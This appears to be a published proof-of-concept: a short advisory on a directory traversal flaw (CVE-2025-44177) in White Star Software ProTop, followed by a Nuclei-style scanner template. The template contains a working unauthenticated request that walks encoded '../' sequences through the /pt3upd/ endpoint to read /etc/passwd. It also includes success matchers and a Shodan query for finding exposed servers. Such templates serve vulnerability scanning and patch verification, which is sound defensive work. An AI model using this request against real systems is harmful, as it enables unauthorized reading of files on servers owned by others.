A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
PoC代码[已公开]
id: CVE-2025-44177
info:
name: White Star Software ProTop - Directory Traversal
author: s-cu-bot
severity: high
description: |
A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
remediation: |
Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-44177
- https://client.protop.co.za/
- https://wss.com/
- https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score: 8.2
cve-id: CVE-2025-44177
epss-score: 0.07063
epss-percentile: 0.91151
cwe-id: CWE-22
cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: white-star-software
product: protop
shodan-query: html:"<title>ProTop"
tags: cve,cve2025,lfi,traversal,protop,whitestar,vkev
http:
- raw:
- |
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: header
words:
- 'application/octet-stream'
- 'filename="passwd"'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220476a13243fe70c5a4d17ca9f3d9836b48e37e110100df5e61e10eb68744de000022100ca2034ed498816291b53e418efd74562ff71cc1717a30697f3f36ba95d261105:922c64590222798bb761d5b6d8e72950